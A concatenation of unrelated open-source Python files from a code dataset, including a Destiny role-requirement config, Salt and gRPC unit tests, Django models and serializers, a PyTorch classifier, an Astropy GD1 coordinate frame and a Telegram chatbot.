"replaced_by": ["Solo Flawless Zero Hour"],
},
"Solo Heroic Zero Hour": {
"deprecated": True,
"requirements": ["lowman"],
"denyTime0": { # start is earlier Time, format is important
"startTime": "10/03/2020 18:00",
"endTime": "21/04/2020 18:00",
},
"denyTime1": { # start is earlier Time, format is important
"startTime": "11/08/2020 18:00",
"endTime": "08/09/2020 18:00",
},
"playercount": 1,
"activityHashes": herzeroHashes,
"replaced_by": ["Solo Flawless Heroic Zero Hour"],
},
"Solo Flawless Zero Hour": {
"deprecated": True,
"requirements": ["lowman"],
"playercount": 1,
"denyTime0": { # start is earlier Time, format is important
"startTime": "10/03/2020 18:00",
"endTime": "21/04/2020 18:00",
},
"denyTime1": { # start is earlier Time, format is important
"startTime": "11/08/2020 18:00",
"endTime": "08/09/2020 18:00",
},
"flawless": True,
"activityHashes": zeroHashes,
},
"Solo Flawless Heroic Zero Hour": {
"deprecated": True,
"requirements": ["lowman"],
"denyTime0": { # start is earlier Time, format is important
"startTime": "10/03/2020 18:00",
"endTime": "21/04/2020 18:00",
},
"denyTime1": { # start is earlier Time, format is important
"startTime": "11/08/2020 18:00",
"endTime": "08/09/2020 18:00",
},
"playercount": 1,
"flawless": True,
"activityHashes": herzeroHashes,
},
"Flawless GM": {
"requirements": ["flawless"],
"flawless": gmHashes,
"replaced_by": ["Solo Flawless GM", "Solo Flawless 150k GM"],
},
"Solo Flawless GM": {
"requirements": ["lowman"],
"playercount": 1,
"flawless": True,
"activityHashes": gmHashes,
"replaced_by": ["Solo Flawless 150k GM"],
},
"Solo Flawless 150k GM": {
"requirements": ["lowman"],
"playercount": 1,
"flawless": True,
"score": 150_000,
"activityHashes": gmHashes,
},
},
}
requirement_hashes_without_years = {
rolename: roledata for year, yeardata in requirementHashes.items() for rolename, roledata in yeardata.items()
}
platform = {
1: "Xbox",
2: "Playstation",
3: "Steam",
4: "Blizzard",
5: "Stadia",
10: "Demon",
254: "BungieNext",
}
| StarcoderdataPython |
4889446 | <reponame>amaclean199/salt<filename>tests/unit/modules/test_s3.py
# -*- coding: utf-8 -*-
'''
:codeauthor: :email:`<NAME> <<EMAIL>>`
'''
# Import Python libs
from __future__ import absolute_import, unicode_literals, print_function
# Import Salt Testing Libs
from tests.support.mixins import LoaderModuleMockMixin
from tests.support.unit import skipIf, TestCase
from tests.support.mock import (
MagicMock,
NO_MOCK,
NO_MOCK_REASON,
patch
)
# Import Salt Libs
import salt.modules.s3 as s3
@skipIf(NO_MOCK, NO_MOCK_REASON)
class S3TestCase(TestCase, LoaderModuleMockMixin):
def setup_loader_modules(self):
return {s3: {'__utils__': {'s3.query': MagicMock(return_value='A')}}}
def test__get_key_defaults(self):
mock = MagicMock(return_value='')
with patch.dict(s3.__salt__, {'config.option': mock}):
key, keyid, service_url, verify_ssl, kms_keyid, location, role_arn, path_style, https_enable = (
s3._get_key(None, None, None, None, None, None, None, None, None))
self.assertEqual(None, role_arn)
self.assertEqual(None, key)
self.assertEqual(None, keyid)
self.assertEqual('s3.amazonaws.com', service_url)
self.assertEqual('', verify_ssl)
self.assertEqual('', location)
self.assertEqual('', path_style)
self.assertEqual('', https_enable)
def test_delete(self):
'''
Test for delete a bucket, or delete an object from a bucket.
'''
with patch.object(s3, '_get_key',
return_value=('key', 'keyid', 'service_url',
'verify_ssl', 'kms_keyid', 'location',
'role_arn', 'path_style', 'https_enable')):
self.assertEqual(s3.delete('bucket'), 'A')
def test_get(self):
'''
Test for list the contents of a bucket, or return an object from a
bucket.
'''
with patch.object(s3, '_get_key',
return_value=('key', 'keyid', 'service_url',
'verify_ssl', 'kms_keyid', 'location',
'role_arn', 'path_style', 'https_enable')):
self.assertEqual(s3.get(), 'A')
def test_head(self):
'''
Test for return the metadata for a bucket, or an object in a bucket.
'''
with patch.object(s3, '_get_key',
return_value=('key', 'keyid', 'service_url',
'verify_ssl', 'kms_keyid', 'location',
'role_arn', 'path_style', 'https_enable')):
self.assertEqual(s3.head('bucket'), 'A')
def test_put(self):
'''
Test for create a new bucket, or upload an object to a bucket.
'''
with patch.object(s3, '_get_key',
return_value=('key', 'keyid', 'service_url',
'verify_ssl', 'kms_keyid', 'location',
'role_arn', 'path_style', 'https_enable')):
self.assertEqual(s3.put('bucket'), 'A')
| StarcoderdataPython |
9726649 | <reponame>max-belichenko/Django-Polls-API
from rest_framework import serializers
from .models import (
Poll,
Question,
Choice,
Answer,
)
class PollSerializer(serializers.ModelSerializer):
def update(self, instance, validated_data):
instance.title = validated_data.get('title', instance.title)
instance.description = validated_data.get('description', instance.description)
# instance.start_date = validated_data.get('start_date', instance.start_date)
instance.end_date = validated_data.get('end_date', instance.end_date)
instance.save()
return instance
class Meta:
model = Poll
fields = ('id', 'title', 'description', 'start_date', 'end_date')
class QuestionSerializer(serializers.ModelSerializer):
class Meta:
model = Question
fields = ('id', 'poll', 'type', 'text')
class ChoiceSerializer(serializers.ModelSerializer):
class Meta:
model = Choice
fields = ('id', 'question', 'text')
class AnswerSerializer(serializers.ModelSerializer):
class Meta:
model = Answer
fields = ['user_id', 'question', 'text_answer', 'choice_answer']
| StarcoderdataPython |
1656998 | <filename>data/test/python/d6dad40da08cf800232fb8d8603b68e5c856631c__init__.py
from flask import Flask
from flask.ext.restful import Api
app = Flask(__name__)
api = Api(app)
app.config.from_object('emonitor.config.Config')
from emonitor.modules.api.job import JobListApi
from emonitor.modules.api.job import JobApi
from emonitor.modules.api.job import JobOembedApi
from emonitor.modules.api.job import JobThumbnailApi
api.add_resource(JobListApi, '/api/job')
api.add_resource(JobApi, '/api/job/<job_id>')
api.add_resource(JobOembedApi, '/api/job/oembed')
api.add_resource(JobThumbnailApi, '/api/job/thumbnail/<job_id>/<frame>')
from emonitor.modules.api.job import BitcoinApi
from emonitor.modules.api.job import BitcoinCallbackApi
from emonitor.modules.api.job import BitcoinCheckApi
api.add_resource(BitcoinApi, '/api/bitcoin')
api.add_resource(BitcoinCallbackApi, '/api/bitcoin/callback/<bid>/<int:secret>')
api.add_resource(BitcoinCheckApi, '/api/bitcoin/<bid>')
from emonitor.modules.main import main
app.register_blueprint(main)
| StarcoderdataPython |
6543856 | from django.contrib import admin
from .models import DesafioInovacao
from .models import InovacaoAberta
from .models import ReuniaoGrupoPesquisa
from .models import ReuniaoEmpresa
from .models import AtendimentoEmpreendedor
admin.site.register(DesafioInovacao)
admin.site.register(InovacaoAberta)
admin.site.register(ReuniaoGrupoPesquisa)
admin.site.register(ReuniaoEmpresa)
admin.site.register(AtendimentoEmpreendedor)
# Register your models here.
| StarcoderdataPython |
5047948 | <gh_stars>0
# Generated by Django 4.0.1 on 2022-02-11 12:01
from django.db import migrations, models
import django.db.models.deletion
import uuid
class Migration(migrations.Migration):
dependencies = [
('users', '0003_profile_location_skill'),
]
operations = [
migrations.CreateModel(
name='Message',
fields=[
('name', models.CharField(blank=True, max_length=200, null=True)),
('email', models.EmailField(blank=True, max_length=200, null=True)),
('subject', models.CharField(blank=True, max_length=200, null=True)),
('body', models.TextField()),
('is_read', models.BooleanField(default=False, null=True)),
('created', models.DateTimeField(auto_now_add=True)),
('id', models.UUIDField(default=uuid.uuid4, editable=False, primary_key=True, serialize=False, unique=True)),
('recipient', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='messages', to='users.profile')),
('sender', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to='users.profile')),
],
options={
'ordering': ['is_read', 'created'],
},
),
]
| StarcoderdataPython |
160153 | <filename>example/helloworld/test.py
import unittest
import grpc
from homi.test_case import HomiTestCase
from .app import app
from .helloworld_pb2 import HelloRequest, _GREETER
class GreeterTestCase(HomiTestCase):
app = app
def test_hello_say(self):
server = self.get_test_server()
name = "tom"
request = HelloRequest(name=name)
method = server.invoke_unary_unary(
method_descriptor=(_GREETER.methods_by_name['SayHello']),
invocation_metadata={},
request=request, timeout=1)
response, metadata, code, details = method.termination()
self.assertEqual(response.message, f'Hello {name}!')
self.assertEqual(code, grpc.StatusCode.OK)
def test_hello_say_group(self):
server = self.get_test_server()
name = "groupA"
request = HelloRequest(name=name)
method = server.invoke_unary_stream(
method_descriptor=(_GREETER.methods_by_name['SayHelloGroup']),
invocation_metadata={},
request=request, timeout=1)
reps = self.get_all_response(method)
self.assertEqual(len(reps), 4)
return_names = ['a', 'b', 'c', 'd']
for idx, rep in enumerate(reps):
self.assertEqual(rep.message, f"Hello {return_names[idx]}!")
metadata, code, details = method.termination()
self.assertEqual(code, grpc.StatusCode.OK)
def test_hello_everyone(self):
server = self.get_test_server()
method = server.invoke_stream_unary(
method_descriptor=(_GREETER.methods_by_name['HelloEveryone']),
invocation_metadata={},
timeout=1
)
names = ["tom", 'sam', 'wony', 'homi']
self.send_request_all(method, (HelloRequest(name=name) for name in names))
response, metadata, code, details = method.termination()
print(details)
self.assertEqual(code, grpc.StatusCode.OK)
self.assertEqual(response.message, f'Hello everyone {names}!')
def test_say_hello_one_by_one(self):
server = self.get_test_server()
method = server.invoke_stream_stream(
method_descriptor=(_GREETER.methods_by_name['SayHelloOneByOne']),
invocation_metadata={},
timeout=1
)
names = ["tom", 'sam', 'wony', 'homi']
self.send_request_all(method, (HelloRequest(name=name) for name in names))
reps = self.get_all_response(method)
self.assertEqual(len(reps), len(names))
for rep, name in zip(reps, names):
self.assertEqual(rep.message, f'Hello {name}!')
metadata, code, details = method.termination()
self.assertEqual(code, grpc.StatusCode.OK)
if __name__ == '__main__':
unittest.main()
| StarcoderdataPython |
6587552 | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
class ContactDetails(Model):
"""Contains all the contact details of the customer.
All required parameters must be populated in order to send to Azure.
:param contact_person: Required. The contact person name.
:type contact_person: str
:param company_name: Required. The name of the company.
:type company_name: str
:param phone: Required. The phone number.
:type phone: str
:param email_list: Required. The email list.
:type email_list: list[str]
"""
_validation = {
'contact_person': {'required': True},
'company_name': {'required': True},
'phone': {'required': True},
'email_list': {'required': True},
}
_attribute_map = {
'contact_person': {'key': 'contactPerson', 'type': 'str'},
'company_name': {'key': 'companyName', 'type': 'str'},
'phone': {'key': 'phone', 'type': 'str'},
'email_list': {'key': 'emailList', 'type': '[str]'},
}
def __init__(self, *, contact_person: str, company_name: str, phone: str, email_list, **kwargs) -> None:
super(ContactDetails, self).__init__(**kwargs)
self.contact_person = contact_person
self.company_name = company_name
self.phone = phone
self.email_list = email_list
| StarcoderdataPython |
1783592 | <gh_stars>1-10
# -*- coding: utf-8 -*-
r"""An interaction model $f:\mathcal{E} \times \mathcal{R} \times \mathcal{E} \rightarrow \mathbb{R}$ computes a
real-valued score representing the plausibility of a triple $(h,r,t) \in \mathbb{K}$ given the embeddings for the
entities and relations. In general, a larger score indicates a higher plausibility. The interpretation of the
score value is model-dependent, and usually it cannot be directly interpreted as a probability.
""" # noqa: D205, D400
from typing import Set, Type
from class_resolver import Resolver, get_subclasses
from .base import EntityEmbeddingModel, EntityRelationEmbeddingModel, Model, MultimodalModel, _OldAbstractModel
from .multimodal import ComplExLiteral, DistMultLiteral
from .nbase import ERModel, _NewAbstractModel
from .resolve import make_model, make_model_cls
from .unimodal import (
ComplEx,
ConvE,
ConvKB,
DistMult,
ERMLP,
ERMLPE,
HolE,
KG2E,
MuRE,
NTN,
PairRE,
ProjE,
RESCAL,
RGCN,
RotatE,
SimplE,
StructuredEmbedding,
TransD,
TransE,
TransH,
TransR,
TuckER,
UnstructuredModel,
)
__all__ = [
# Base Models
'Model',
'_OldAbstractModel',
'EntityEmbeddingModel',
'EntityRelationEmbeddingModel',
'_NewAbstractModel',
'ERModel',
'MultimodalModel',
# Concrete Models
'ComplEx',
'ComplExLiteral',
'ConvE',
'ConvKB',
'DistMult',
'DistMultLiteral',
'ERMLP',
'ERMLPE',
'HolE',
'KG2E',
'MuRE',
'NTN',
'PairRE',
'ProjE',
'RESCAL',
'RGCN',
'RotatE',
'SimplE',
'StructuredEmbedding',
'TransD',
'TransE',
'TransH',
'TransR',
'TuckER',
'UnstructuredModel',
# Utils
'model_resolver',
'make_model',
'make_model_cls',
]
_MODELS: Set[Type[Model]] = {
subcls
for subcls in get_subclasses(Model) # type: ignore
if not subcls._is_base_model
}
model_resolver = Resolver(classes=_MODELS, base=Model) # type: ignore
| StarcoderdataPython |
3577595 | <reponame>richard-clifford/GoKeyBruter<filename>GoKeyBruter.py<gh_stars>0
import threading
import subprocess
import argparse
counter = 0
def brute_realm(args, password):
password = password.strip()
with open(args.realm_list) as realm_list:
for r in realm_list:
r = r.strip()
if(args.v):
print "[*] Trying [%s:%s] " % (r,password,)
output = run_process(args.g, r, password)
if(output.strip() == args.p):
print "[+] Found the master password! [%s:%s]" % (password.strip(), r)
return output
return ''
def run_process(go_bin, realm, password):
output = subprocess.check_output([go_bin, "-r", realm, "-p", password.strip()])
return output.strip()
def generate_table(args, realm):
global counter
counter = 0
cracked = False
master_password = ''
file = open(args.w, 'r')
line = file.readlines(counter)
while cracked == False and counter < len(line)-1:
counter = counter + 1
if(counter % 10000 == 0):
print "[+] %d checked." % (counter)
if(args.brute_realm):
output = brute_realm(args, line[counter].strip())
else:
output = run_process(args.g, realm, line[counter].strip()).strip()
if(output == args.p):
master_password = output
print "[+] Found the master password! [%s:%s]" % (output, realm.strip())
cracked = True
break
return master_password
def main():
parser = argparse.ArgumentParser(description='Arguments for GoKeyBruter')
parser.add_argument('-g', required=True, help='The GoKey Binary Location')
parser.add_argument('-r', help='The GoKey "Realm"')
parser.add_argument('-p', help='The GoKey Plaintext Password')
parser.add_argument('-v', help='Set Verbosity On/Off')
parser.add_argument('-w', required=True, help='Custom wordlist (Currently Required)')
parser.add_argument('-t', type=int, required=True, help='Threads')
parser.add_argument('--brute-realm', help='Attempt to Brute Force the Realm')
parser.add_argument('--realm-list', help='Attempt to Brute Force the Realm')
parser.add_argument('--master-password', help='If the --brute-realm flag is set you can use this flag to just brute the realm if you already know the Master Password but need the Realm')
arguments = parser.parse_args()
realm = ''
if arguments.r:
realm = arguments.r
else:
if arguments.brute_realm:
realm = arguments.realm_list
for x in range(arguments.t):
threading.Thread(name='Thread-{}'.format(x), target=generate_table, args=(arguments,realm,)).start()
if __name__ == '__main__':
main() | StarcoderdataPython |
4981524 | <filename>ext/youtube.py<gh_stars>0
import discord
import os
import concurrent.futures
import urllib.request
import json
from discord.ext import commands, tasks
from utils._errors import SocialAlreadyImplemented, SocialNotFound, SocialDoesNotExist
from sqlite3 import IntegrityError
from datetime import datetime
class YouTube(commands.Cog):
def __init__(self, bot):
self.bot = bot
self.api_key = os.environ['YOUTUBE_API_KEY']
self.base_video_url = 'https://www.youtube.com/watch?v='
self.base_search_url = 'https://www.googleapis.com/youtube/v3/search?'
self.announced = dict()
self.bot.loop.create_task(self.updateChannels())
async def updateChannels(self):
await self.bot.wait_until_ready()
async with self.bot.db.execute("SELECT youtube FROM social") as cursor:
rows = await cursor.fetchall()
try:
self.channels = [i[0] for i in rows if i[0] != None]
except IndexError:
self.channels = list()
print("YouTube Plugin:",self.channels)
self.check_for_new_video.start()
async def cog_command_error(self, ctx, error):
# Gets original attribute of error
error = getattr(error, "original", error)
if isinstance(error, SocialDoesNotExist):
await ctx.send("That Channel is not in the database!")
elif isinstance(error, SocialNotFound):
await ctx.send("Could not find Channel or Data API Rate Limit Reached. To convert username -> channel ID use this converter: https://socialnewsify.com/get-channel-id-by-username-youtube/")
elif isinstance(error, SocialAlreadyImplemented):
await ctx.send("That Channel is already in the database!")
#Able to handle ~30 channels per day.
@tasks.loop(seconds=28800)
async def check_for_new_video(self):
channels = self.channels
if len(channels) == 0:
return
for channelID in channels:
with concurrent.futures.ThreadPoolExecutor() as pool:
result = await self.bot.loop.run_in_executor(pool, self.get_latest_video, channelID)
#Youtube Data API rate limit reached
if not result:
return
video_link, channel_title = result
try:
if video_link == self.announced[channel_title]:
print("Already Announced")
continue
except KeyError:
pass
channel = self.bot.get_channel(int(os.environ["ANNOUNCEMENT-CHANNEL-YOUTUBE"]))
with open('./customize/announce_youtube.txt','r') as textFile:
text = textFile.read().format(user=channel_title,url=video_link)
await channel.send(text)
self.announced[channel_title] = video_link
@check_for_new_video.before_loop
async def before_check(self):
await self.bot.wait_until_ready()
def get_latest_video(self,channel_id):
try:
first_url = self.base_search_url+'key={}&channelId={}&part=snippet,id&order=date&maxResults=1'.format(self.api_key, channel_id)
video_links = []
url = first_url
inp = urllib.request.urlopen(url)
resp = json.load(inp)
channelTitle = resp['items'][0]['snippet']['channelTitle']
for i in resp['items']:
if i['id']['kind'] == "youtube#video":
video_links.append(self.base_video_url + i['id']['videoId'])
try:
next_page_token = resp['nextPageToken']
url = first_url + '&pageToken={}'.format(next_page_token)
except:
return (video_links[0], channelTitle)
return (video_links[0], channelTitle)
except Exception as e:
return False
def validate(self, channel_id : str) -> bool:
try:
first_url = self.base_search_url+'key={}&channelId={}&part=snippet,id&order=date&maxResults=1'.format(self.api_key, channel_id)
url = first_url
inp = urllib.request.urlopen(url)
resp = json.load(inp)
channelTitle = resp['items'][0]['snippet']['channelTitle']
except Exception as e:
print(e)
return False
else:
return channelTitle if channelTitle else False
@commands.guild_only()
@commands.has_permissions(administrator=True)
@commands.command(name="addyt", description="Command to add Channel", aliases=['addyoutube','ay'])
async def addyt(self, ctx, channel_id : str):
await ctx.trigger_typing()
with concurrent.futures.ThreadPoolExecutor() as pool:
result = await self.bot.loop.run_in_executor(pool, self.validate, channel_id)
if not result:
raise SocialNotFound
sql = 'INSERT INTO social(youtube) VALUES (?)'
try:
async with self.bot.db.execute(sql, (channel_id,)) as cursor:
await self.bot.db.commit()
except IntegrityError:
raise SocialAlreadyImplemented
else:
self.channels.append(channel_id)
embed = discord.Embed(
title="Action Successful",
description=f"Channel Added: **{result}**",
colour=discord.Colour.red()
)
return await ctx.send(embed=embed)
@commands.guild_only()
@commands.has_permissions(administrator=True)
@commands.command(name='removeyt',description='Command to remove channel',aliases=['ry','removeyoutube'])
async def removeyt(self, ctx, channel_id : str):
if channel_id not in self.channels:
raise SocialDoesNotExist
sql = 'DELETE FROM social WHERE youtube=?'
async with self.bot.db.execute(sql, (channel_id,)) as cursor:
await self.bot.db.commit()
self.channels.remove(channel_id)
embed = discord.Embed(
title="Action Successful",
description=f"Channel Removed: **{channel_id}**",
colour=discord.Colour.from_rgb(255,255,255)
)
await ctx.send(embed=embed)
@commands.guild_only()
@commands.has_permissions(administrator=True)
@commands.command(name='listyt', description='Command that lists all channels being Monitored', aliases=['ly','listyoutube'])
async def listyt(self, ctx):
if len(self.channels) == 0:
return await ctx.send("There are currently no Channels being monitored. Add them via the `addyt` command")
mapped = '\n'.join(map(str,self.channels))
embed = discord.Embed(
title="List of Channels currently being Monitored",
description=f"`{mapped}`",
colour=discord.Colour.dark_red(),
timestamp=datetime.utcnow()
)
embed.set_footer(text=f"{ctx.author.name}#{ctx.author.discriminator}", icon_url=ctx.author.avatar_url)
return await ctx.send(embed=embed)
#Setup
def setup(bot):
bot.add_cog(YouTube(bot))
| StarcoderdataPython |
11218943 | <gh_stars>0
import torch
import collections
class Classifier(torch.nn.Module):
def __init__(self, conv_layer_info, dense_layer_info, batch_norm = False):
super(Classifier, self).__init__()
conv_layers = collections.OrderedDict()
prev_channels = 3
cur_side = 32
for i, (channels, pool_size, pdropout) in enumerate(conv_layer_info):
conv_layers['conv_{}'.format(i)] = torch.nn.Conv2d(prev_channels, channels, 3,padding=1)
if batch_norm:
conv_layers['conv_batch_norm_{}'.format(i)] = torch.nn.BatchNorm2d(channels)
conv_layers['conv_relu_{}'.format(i)] = torch.nn.ReLU()
if pool_size > 1:
conv_layers['conv_maxpool_{}'.format(i)] = torch.nn.MaxPool2d(pool_size)
cur_side = cur_side // pool_size
if pdropout >= 0.0:
conv_layers['conv_dropout_{}'.format(i)] = torch.nn.Dropout(pdropout)
prev_channels = channels
self.conv_layers = torch.nn.Sequential(conv_layers)
self.pre_linear_shape = prev_channels * cur_side * cur_side
hidden_layers = collections.OrderedDict()
for i, (hs, pdropout) in enumerate(dense_layer_info):
if i == 0:
hidden_layers['lin_linear_0'] = torch.nn.Linear(self.pre_linear_shape, hs)
else:
hidden_layers['lin_linear_{}'.format(i)] = torch.nn.Linear(dense_layer_info[i-1][0], hs)
if batch_norm:
hidden_layers['lin_batch_norm_{}'.format(i)] = torch.nn.BatchNorm1d(hs)
hidden_layers['lin_relu_{}'.format(i)] = torch.nn.ReLU()
if pdropout > 0.0:
hidden_layers['lin_dropout_{}'.format(i)] = torch.nn.Dropout(pdropout)
if len(dense_layer_info) == 0:
final_input_size = self.pre_linear_shape
else:
final_input_size = dense_layer_info[-1][0]
hidden_layers['final_linear'] = torch.nn.Linear(final_input_size, 10)
self.hidden_layers = torch.nn.Sequential(hidden_layers)
def forward(self, x):
x = self.conv_layers(x)
x = x.view(-1, self.pre_linear_shape)
x = self.hidden_layers(x)
return x
| StarcoderdataPython |
9781329 | import os
from telegram.ext import Filters, MessageHandler, Updater
import bot_config
from data import data
import model
WHITELIST = '0123456789abcdefghijklmnopqrstuvwxyzабвгдеёжзийклмнопрстуфхцчшщъыьэюя ' # space is included in whitelist
BLACKLIST = '!"#$%&\'()*+,-./:;<=>?@[\\]^_`{|}~\''
seq2seq, sess = None, None
def echo(bot, update):
query = update.message.text
print('Conversation query:', query)
query = ''.join([c for c in query.lower() if c in WHITELIST])
query = ' '.join(query.split(' ')[:data.limit['maxq']])
reply_ar = seq2seq.predict_one(sess, query)
reply = []
for w in reply_ar:
if w == 'end_id':
break
reply.append(w)
answer = ' '.join(reply).capitalize()
print('Conversation reply:', answer)
update.message.reply_text(answer)
if __name__ == '__main__':
# init tf model here
updater = Updater(token=bot_config.TOKEN)
updater.dispatcher.add_handler(MessageHandler(Filters.text, echo))
updater.start_polling()
# prepare and load model
metadata, idx_q, idx_a = data.load_data(PATH='data/')
w2idx = metadata['w2idx'] # dict word 2 index
idx2w = metadata['idx2w'] # list index 2 word
print('Loading vocab done:', 'shapes', idx_q.shape, idx_a.shape)
vocab_size = len(idx2w)
start_id = vocab_size
end_id = vocab_size + 1
w2idx['start_id'] = start_id
w2idx['end_id'] = end_id
idx2w += ['start_id', 'end_id']
os.environ['CUDA_VISIBLE_DEVICES'] = '-1'
seq2seq = model.Model(w2idx, idx2w, True)
sess = seq2seq.restore()
print('Start listening...')
updater.idle()
| StarcoderdataPython |
1813538 | <gh_stars>0
import ordered_set
from typing import Iterable
SLICE_ALL = ordered_set.SLICE_ALL
# monkey patching the OrderedSet implementation
def insert(self, index, key):
"""Adds an element at a dedicated position in an OrderedSet.
This implementation is meant for the OrderedSet from the ordered_set
package only.
"""
if key in self.map:
return
# compute the right index
size = len(self.items)
if index < 0:
index = size + index if size + index > 0 else 0
else:
index = index if index < size else size
# insert the value
self.items.insert(index, key)
for k, v in self.map.items():
if v >= index:
self.map[k] = v + 1
self.map[key] = index
def pop(self, index=None):
"""Removes an element at the tail of the OrderedSet or at a dedicated
position.
This implementation is meant for the OrderedSet from the ordered_set
package only.
"""
if not self.items:
raise KeyError('Set is empty')
def remove_index(i):
elem = self.items[i]
del self.items[i]
del self.map[elem]
return elem
if index is None:
elem = remove_index(-1)
else:
size = len(self.items)
if index < 0:
index = size + index
if index < 0:
raise IndexError('assignement index out of range')
elif index >= size:
raise IndexError('assignement index out of range')
elem = remove_index(index)
for k, v in self.map.items():
if v >= index and v > 0:
self.map[k] = v - 1
return elem
def __setitem__(self, index, item):
if isinstance(index, slice):
raise KeyError('Item assignation using slices is not yet supported '
'for {}'.format(self.__class__.__name__))
if index < 0:
index = len(self.items) + index
if index < 0:
raise IndexError('assignement index out of range')
self.pop(index)
self.insert(index, item)
def __getitem__(self, index):
if isinstance(index, slice) and index == SLICE_ALL:
return self.copy()
elif isinstance(index, Iterable):
return self.subcopy(self.items[i] for i in index)
elif isinstance(index, slice) or hasattr(index, "__index__"):
result = self.items[index]
if isinstance(result, list):
return self.subcopy(result)
else:
return result
else:
raise TypeError("Don't know how to index an OrderedSet by %r" % index)
def subcopy(self, subitems):
"""
This method is here mainly for overriding
"""
return self.__class__(subitems)
ordered_set.OrderedSet.insert = insert
ordered_set.OrderedSet.pop = pop
ordered_set.OrderedSet.__setitem__ = __setitem__
ordered_set.OrderedSet.__getitem__ = __getitem__
ordered_set.OrderedSet.subcopy = subcopy
| StarcoderdataPython |
1620315 | <gh_stars>1-10
from haystack import indexes
from nuremberg.photographs.models import Photograph
class PhotographId(indexes.SearchIndex, indexes.Indexable):
text = indexes.CharField(document=True, use_template=True)
highlight = indexes.CharField(model_attr='description')
material_type = indexes.CharField(default='Photograph', faceted=True)
grouping_key = indexes.FacetCharField(facet_for='grouping_key') # not really a facet, just an exact key
slug = indexes.CharField(model_attr='slug', indexed=False)
title = indexes.CharField(model_attr='title')
literal_title = indexes.CharField(model_attr='description', null=True)
thumb_url = indexes.CharField(model_attr='thumb_url', indexed=False, null=True)
date = indexes.CharField(model_attr='year_taken', faceted=True, null=True)
date_sort = indexes.DateTimeField(model_attr='date', null=True)
date_year = indexes.CharField(model_attr='date_year', faceted=True, null=True)
source = indexes.CharField(default='Photographic Archive', faceted=True, null=True)
total_pages = indexes.IntegerField(default=1, null=True)
def get_model(self):
return Photograph
def prepare_grouping_key(self, photo):
# This is a hack to group transcripts but not documents in a single query.
# Transcripts get a group key, documents get a unique key.
# This can be changed to make grouping work on volume or something else.
return 'Photograph_{}'.format(photo.id)
| StarcoderdataPython |
9619552 | import requests
class News():
apikey = "8a6b8c7a93c04c969ee984d8dc2d196f"
base_url = "https://newsapi.org/v2/"
def make_request(url,q="",country=""):
p={
'apiKey':News.apikey,
}
if country!="":
p['country']=country
if q!="":
p['q']=q
try:
r=requests.get(url,params=p)
except requests.exceptions.RequestException:
return {
'success':False,
'message':'Error getting response'
}
j=r.json()
if r.status_code == '401':
return {
'success':False,
'message':'Key limit exceeded'
}
elif r.status_code==200:
return {
'success':True,
'j':j
}
else:
return {
'success':False,
'message':'Network problem'
}
def process_query(url,q="",country=""):
j=News.make_request(url,q,country)
if j['success']:
j=j['j']
a=[]
try:
for article in j['articles']:
title=article['title']
description=article['description']
url=article['url']
a.append({
'title':title,
'url':url,
'description':description
})
return{
'success':True,
'a':a
}
except ValueError:
return {
'success':False,
'message':'Error getting response'
}
except KeyError:
return {
'success':False,
'message':'Error getting response'
}
else:
return j
#DO NOT USE THIS
def get_news(q):
return News.process_query("{}everything".format(News.base_url),q)
def get_world_top_headlines(q=""):
return News.process_query("{}top-headlines".format(News.base_url),q,'us')
def get_india_top_headlines(q=""):
return News.process_query("{}top-headlines".format(News.base_url),q,'in')
def main():
s=input()
n=News.get_india_top_headlines(s)
if n['success']:
for article in n['a']:
print(article)
input()
if __name__ == '__main__':
main() | StarcoderdataPython |
5172563 | # coding: utf-8
""" Astropy coordinate class for the Sagittarius coordinate system """
from __future__ import division, print_function
# Third-party
import numpy as np
import astropy.units as u
import astropy.coordinates as coord
from astropy.coordinates import frame_transform_graph
from astropy.coordinates.matrix_utilities import matrix_transpose
__all__ = ["GD1"]
class GD1(coord.BaseCoordinateFrame):
"""
A Heliocentric spherical coordinate system defined by the orbit
of the GD1 stream, as described in
Koposov et al. 2010 (see: `<http://arxiv.org/abs/0907.1085>`_).
For more information about this class, see the Astropy documentation
on coordinate frames in :mod:`~astropy.coordinates`.
Parameters
----------
representation : :class:`~astropy.coordinates.BaseRepresentation` or None
A representation object or None to have no data (or use the other keywords)
phi1 : angle_like, optional, must be keyword
The longitude-like angle corresponding to Orphan's orbit.
phi2 : angle_like, optional, must be keyword
The latitude-like angle corresponding to Orphan's orbit.
distance : :class:`~astropy.units.Quantity`, optional, must be keyword
The Distance for this object along the line-of-sight.
pm_phi1_cosphi2 : :class:`~astropy.units.Quantity`, optional, must be keyword
The proper motion in the longitude-like direction corresponding to
the Orphan stream's orbit.
pm_phi2 : :class:`~astropy.units.Quantity`, optional, must be keyword
The proper motion in the latitude-like direction perpendicular to the
Orphan stream's orbit.
radial_velocity : :class:`~astropy.units.Quantity`, optional, must be keyword
The Distance for this object along the line-of-sight.
"""
default_representation = coord.SphericalRepresentation
default_differential = coord.SphericalCosLatDifferential
frame_specific_representation_info = {
coord.SphericalRepresentation: [
coord.RepresentationMapping('lon', 'phi1'),
coord.RepresentationMapping('lat', 'phi2'),
coord.RepresentationMapping('distance', 'distance')],
}
_default_wrap_angle = 180*u.deg
def __init__(self, *args, **kwargs):
wrap = kwargs.pop('wrap_longitude', True)
super().__init__(*args, **kwargs)
if wrap and isinstance(self._data, (coord.UnitSphericalRepresentation,
coord.SphericalRepresentation)):
self._data.lon.wrap_angle = self._default_wrap_angle
# Rotation matrix as defined in the Appendix of Koposov et al. (2010)
R = np.array([[-0.4776303088, -0.1738432154, 0.8611897727],
[0.510844589, -0.8524449229, 0.111245042],
[0.7147776536, 0.4930681392, 0.4959603976]])
@frame_transform_graph.transform(coord.StaticMatrixTransform, coord.ICRS, GD1)
def icrs_to_gd1():
""" Compute the transformation from Galactic spherical to
heliocentric GD1 coordinates.
"""
return R
@frame_transform_graph.transform(coord.StaticMatrixTransform, GD1, coord.ICRS)
def gd1_to_icrs():
""" Compute the transformation from heliocentric GD1 coordinates to
spherical Galactic.
"""
return matrix_transpose(icrs_to_gd1())
| StarcoderdataPython |
215515 | <reponame>melfm/robosuite
"""
Script to showcase domain randomization functionality.
"""
import robosuite.utils.macros as macros
from robosuite.controllers import load_controller_config
from robosuite.utils.input_utils import *
